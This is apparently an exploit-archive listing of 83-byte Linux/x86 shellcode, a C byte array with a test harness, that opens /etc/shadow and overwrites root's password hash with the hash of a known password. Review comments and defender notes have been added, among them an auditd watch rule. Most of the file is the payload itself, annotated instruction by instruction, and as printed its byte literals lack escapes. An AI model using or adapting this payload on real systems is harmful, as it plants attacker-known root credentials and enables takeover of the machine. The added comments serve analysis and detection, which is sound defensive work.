# Title : Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83
# Published : 2010-05-27
# Author : agix
/*
| Title: Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83 Bytes
| Description: replaces root's password hash with the MD5 hash of "agix"
| Type: Shellcode
| Author: agix
| Platform: Linux X86
*/
#include <stdio.h>
/*
 * Byte string for the 32-bit Linux/x86 payload named in the page header.
 * The per-line comments give the intended instruction for each byte group.
 * NOTE(review): as rendered here the literals carry no backslash escapes, so
 * they are plain text characters rather than the bytes the comments name.
 *
 * Intended sequence, read from the per-line comments:
 *   1. build the NUL-terminated path "//etc/shadow" on the stack;
 *   2. int 0x80 with eax = 5 (open on i386), ebx = path, cx = 0x191;
 *   3. jmp/call/pop to obtain the address of the trailing 32 data bytes;
 *   4. int 0x80 with al = 0xb5 (pwrite64 on i386), ebx = fd from step 2,
 *      ecx = data, edx = 0x20 (length), esi:edi = 8:0 (file offset).
 * The return value of the open call is not checked before it is used as fd.
 * Offset 8 presumably skips a leading "root:" plus hash-type prefix; the page
 * does not say, so treat that as an assumption.
 *
 * Defender notes: the write can only succeed for a process that already has
 * write access to /etc/shadow (normally root only), so this is credential
 * tampering after a privilege gain, not a privilege escalation in itself.
 * File-integrity monitoring or an audit watch on the file (for example an
 * auditd rule `-w /etc/shadow -p wa`) surfaces writes that do not come from
 * the expected account-management tools.
 */
char shellcode[] =
// --- path string pushed in reverse, terminated by the zero in ecx ---
"x31xC9" //xor ecx,ecx
"x51" //push ecx
"x68x61x64x6Fx77" //push dword 0x776f6461
"x68x63x2Fx73x68" //push dword 0x68732f63
"x68x2Fx2Fx65x74" //push dword 0x74652f2f
// --- open: ebx = pointer to the path, cx = flags value, eax = 5 ---
"x89xE3" //mov ebx,esp
"x66xB9x91x01" //mov cx,0x191
"x6Ax05" //push byte +0x5
"x58" //pop eax
"xCDx80" //int 0x80
// --- keep the returned descriptor in ebx for the write ---
"x89xC3" //mov ebx,eax
// --- jump forward to the call, which pushes the address of the data ---
"xEBx0D" //jmp short 0x30
// --- pwrite64: ecx = data address, edx = 32, esi:edi = offset 8 ---
"x59" //pop ecx
"x6Ax20" //push byte +0x20
"x5A" //pop edx
"xB0xB5" //mov al, 0xb5
"x6Ax08" //push byte +0x8
"x5E" //pop esi
"x31xFF" //xor edi,edi
"xCDx80" //int 0x80
"xE8xEExFFxFFxFF" //call 0x22
// --- 32 data bytes written to the file; ASCII form shown on the next line ---
//db "IMMkmgi9$NuhPs1B8H5uz7kEOeKf2H1:"
"x49x4Dx4Dx6Bx6Dx67x69x39"
"x24x4Ex75x68x50x73x31x42"
"x38x48x35x75x7Ax37x6Bx45"
"x4Fx65x4Bx66x32x48x31x3A";
/*
 * Test harness: instead of calling the array, it overwrites a stack slot near
 * the local `ret` with the array's address so that returning from main
 * transfers control there. argc and argv are unused.
 *
 * NOTE(review): this relies on undefined behaviour and on a specific 32-bit
 * frame layout. The pointer-to-int cast truncates on targets where pointers
 * are wider than int, and the slot at &ret + 2 is only the saved return
 * address if the compiler lays the frame out that way. A stack protector or
 * a non-executable data segment is expected to stop it - confirm per build.
 */
int main(int argc, char **argv) {
int *ret;
// Address two ints above the local `ret`; assumed by the author to be main's saved return address.
ret = (int *)&ret + 2;
// Store the array's address in that slot (pointer narrowed to int by the cast).
(*ret) = (int) shellcode;
}